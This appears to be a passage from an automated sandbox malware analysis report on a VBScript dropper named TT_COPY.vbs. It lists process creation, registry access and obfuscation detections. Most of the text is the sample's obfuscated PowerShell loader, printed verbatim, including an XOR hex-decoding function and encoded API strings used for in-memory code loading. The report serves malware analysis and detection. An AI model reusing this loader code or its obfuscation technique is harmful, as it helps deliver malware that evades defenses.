SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0MJump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Impi11.ShellExecute Skyler, " " & chrw(34) + Ce8 + chrw(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 21279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6954
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 21279Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6954Jump to behavior
Source: TT_COPY.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFDC3F80EFD10_2_00007FFDC3F80EFD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0MJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5704:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gby0wth2.meo.ps1Jump to behavior
Source: classification engineClassification label: mal68.evad.winVBS@6/2@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("powershell.exe", " "$Vildmnd = """SaFLauConFacGatUniStoUn", "", "", "0");
Obfuscated command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br 